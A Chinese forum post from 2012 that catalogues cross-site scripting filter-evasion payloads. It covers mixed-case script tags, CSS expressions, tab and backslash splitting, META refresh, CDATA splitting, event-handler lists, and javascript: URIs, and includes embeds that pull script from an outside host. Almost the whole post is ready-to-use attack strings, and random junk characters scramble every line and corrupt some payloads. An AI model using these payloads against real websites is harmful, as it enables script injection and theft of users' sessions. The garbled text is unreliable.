1. 改变字符大小写4 t, `5 V- X/ @
& f5 B7 G' V8 F
' S0 c% x. F& R4 O, b, e0 I: h! t) s4 [3 n; X1 r/ W$ P
<sCript>alert(‘d’)</scRipT>
4 L/ k* y0 d& V$ J% j7 p7 X" |
6 s+ T% L- e% R% r1 O1 g2. 利用多加一些其它字符来规避Regular Expression的检查9 I. ~8 |" l1 J+ e, j! S
$ T$ T: l/ X; i- b8 g <<script>alert(‘c’)//<</script>6 R) `1 c# w& Z* H
- @" P- v5 U+ n <SCRIPT a=">" SRC="t.js"></SCRIPT>
2 ]) r4 x4 ^! N3 L9 e" i' L/ e0 i: H/ a( U. c( P
<SCRIPT =">" SRC="t.js"></SCRIPT>! i" G; [0 }. V1 ^) d7 f! @' K
3 T9 ?/ Q$ I- G8 X7 L
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>8 x/ f. k, d: a. I
4 N9 |6 _# f7 Z: {$ f
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
. S8 R+ L$ r+ E; g9 N" p; R6 q
2 V7 U3 s R3 g9 r8 n <SCRIPT a=`>` SRC="t.js"></SCRIPT>
2 _- d3 E& Z% I: R" d6 B' J* d1 [/ b. S( K/ o- b
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>, J9 N; P# l6 ?8 V( l8 \8 Y: `
9 {- X5 e7 ?2 w, M3. 以其它扩展名取代.js [" A/ J6 d0 d L
, _* f; Z/ a! R3 T# W4 ]& K( i <script src="bad.jpg"></script>
0 |+ h& Q. x* Q Z4 {" ^( d0 q
: y7 A! ?3 }, Q4. 将Javascript写在CSS档里
; p/ P7 M* c* t- B- k- X8 z+ F0 ^
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">& R! q6 I# o& g+ x$ A4 f E
+ w( J3 H; |, ~1 \* Z) ]* ~ example:8 p: y3 ~2 K+ g! A1 E6 o8 T" ^
. T% G% O2 u: o7 ~2 r
body {4 @7 n6 ?; c F3 W
: u; U% o6 U3 ^
background-image: url(‘javascript:alert("XSS");’)
o. U: f& n8 Y9 T& ^* a4 K& ]) y; M* O* w7 M$ g9 M1 e
}
0 g0 C% I6 z- a/ s: ?* m; F1 H
5. 在script的tag里加入一些其它字符! Y1 o# ?, t# g5 j
" h9 P2 R. D' W% e3 x, v2 P% k2 A
<SCRIPT/SRC="t.js"></SCRIPT>2 d1 i4 C6 ]. L" }
* V& p, h5 l0 I7 x" o
<SCRIPT/anyword SRC="t.js"></SCRIPT>9 Q+ U) ~, v: t; y' _
) j- @$ P9 U* J; W m( l+ w' [6. 使用tab或是new line来规避
" v$ T2 t/ k9 C$ D- d8 U& R- U# a7 ]; d4 n
<img src="jav ascr ipt:alert(‘XSS3′)">, `$ G1 s- {) f
1 @/ |( R. T$ B$ n& r8 B/ c
<img src="jav ascr ipt:alert(‘XSS3′)">
* d4 i2 N' k: y- J2 y C X9 g+ K9 [* W& J/ J9 j o0 E
<IMG SRC="jav ascript:alert(‘XSS’);">
, n0 Y' A' |5 ^/ M' F7 r7 k& W
8 { X2 Q9 M6 j' f. H; X/ }- O9 F" @ -> tag2 M! z" ^" q4 G( q
& C2 o( K9 B9 b% n \! Y -> new line* P2 C6 O* T4 X, s
+ l* p: l; ], Z7. 使用"\"来规避( W1 k4 ]; q/ q( u" G* P
* F5 W4 ~ B! X- {9 c <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
: B Z5 e7 v6 c2 X; m' x8 W7 A2 u ?- R3 s! F! i) j% Y
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
( M" e$ \0 w5 [9 s9 [' _2 ?. |8 ~, M# c
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
/ V& @4 _5 J& c- |7 O1 t2 i
, n& m. K$ M" Z; ` <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
, b$ B7 p2 J- c& J" ^6 q
# l' X; o: a) z" v6 U; {- b% U <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
3 P9 f5 H- H# I2 s0 j
0 r A; Y; D, @2 k" u3 r# j9 G/ r H8. 使用Hex encode来规避(也可能会把";"拿掉)
: t% m3 t# v' Y$ ]1 [+ ?$ a4 G$ w# P& y7 Q9 Y) m
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">4 d, V( Y! I: ]7 l6 P
( G& ^. O1 T2 T1 q" M' Z8 H( e
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">; T+ v3 G$ j5 n6 h6 E+ X) Y9 T' u
1 M2 B2 x; p' _3 b4 c# H: ]# n
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">% P( ^/ t; z! [. ?% E m! [0 w
0 a8 N' u4 u# c 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">1 D0 p4 y& E( k ?$ W' l; ~
* @/ d8 G N; l9. script in HTML tag, @$ w- H( k3 h" Q( f
6 G4 T3 @ h5 l <body onload=」alert(‘onload’)」>
1 f! ^* j+ y) z5 ^, J* c
/ `! ]; O" s! H0 g5 ^8 J; O onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
$ Y" }: r$ p8 p
3 D4 a6 a3 t. r( I7 G: \ ]5 `+ l10. 在swf里含有xss的code/ ^! M& M& B; }
% T8 v7 P2 \" E: q8 u
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>; W6 g( [8 y2 v: s
* j. x7 X3 f$ Z, c4 z2 H- j9 ~ D7 V
11. 利用CDATA将xss的code拆开,再组合起来。
( D/ s9 G# J Q* M- X. W
- l: e6 t/ B' Y+ s R. @ <XML ID=I><X><C>1 E: w" T: ]) Z$ L5 @7 [
0 K' r# H8 E0 A ]- R( z <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
$ ?# Z6 ^ C( f8 v9 i& T* M: t' t$ o: x4 D# n c4 ]" ~
</C></X>
9 p9 z1 b& K! q' {6 C. c& T5 N: g7 M7 S, d- [ W
</xml>
6 X" I% W% _. C" k/ ^4 R, ^. O8 ?# |6 l9 Y
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>3 \+ |( H/ [% k; b
! e* y) ^$ E7 p! w <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
3 o) I' g/ z+ _
6 J" t: h' x1 c8 A1 e! `' G <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>. m. f7 L( y, t
% u, k' [; X- g
12. 利用HTML+TIME。
! ]. `) T+ i. A, G+ S( l) m
: a4 X! t7 c. x( d* M/ v <HTML><BODY>
. d F5 q: Q% H) g* S K& C" z+ _' w5 k0 w4 h( X2 H
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">+ l5 M! I+ ]- `8 T3 f( K- G
( \% f( z" R0 {. ` <?import namespace="t" implementation="#default#time2">
, d& ^4 F/ G0 o) a( t$ G' _: e3 O
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>"> X" i( T1 E( s1 g! O; s
- a2 G( R( }. o; x5 C9 {( a$ V, y
</BODY></HTML>
- v, x, D) w% K% i" J
% {: B& h% ~7 S# m e+ J" z7 p13. 透过META写入Cookie。' I! H/ J \7 }, g
5 Q/ L" P6 f/ q
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
. ^! s9 f' |0 Q5 }
! M2 p# ?, ?6 w. f d( W14. javascript in src , href , url
: r, X- n& K* C: D
* j/ n9 |7 S% A8 y <IFRAME SRC=javascript:alert(’13′)></IFRAME>, A& a: i& } [# O
$ m1 J ?" n* _5 J, j: a5 [/ A# w <img src="javascript:alert(‘XSS3′)">8 v* w- Q/ \) z: {% T
/ ^7 V T. Q+ l$ h( S. }3 K9 {
<IMG DYNSRC="javascript:alert(‘XSS20′)">
) s$ {' w+ A [& Q% Q* S6 f+ A7 T0 ~5 K# a* n1 q
<IMG LOWSRC="javascript:alert(‘XSS21′)">
& h4 C5 F$ U, K2 [8 A
1 u+ Q. q) d$ G2 E' R, a) r <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">; h6 Q5 N% i' _0 D1 `6 d% u+ ^
0 l) z1 i% Y4 _ G) V- T3 i
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>: y( D e# `" n
. Q X W5 {- J& |. ?7 U: h
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
" u7 {7 B. |# a$ g8 h* W4 |; Y7 `3 H( O4 j2 U: ]
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
: p$ K" m% c+ F: K" s4 P+ c- u
, _/ A2 F3 `" H! b% v& _2 P <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
& R* D7 a7 Z# Z- m# y/ @5 X0 i+ |- j. ]
</STYLE><A CLASS=XSS></A>
c2 S0 L. |: ^/ b% h) W$ ^4 U
2 Z3 H2 U2 m G4 G/ e, I <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
$ E7 V7 X O% r" `
, P2 ^" n( ^+ }) [9 w0 w4 S |
发表于 2012-12-31 09:59:28
收藏
支持
反对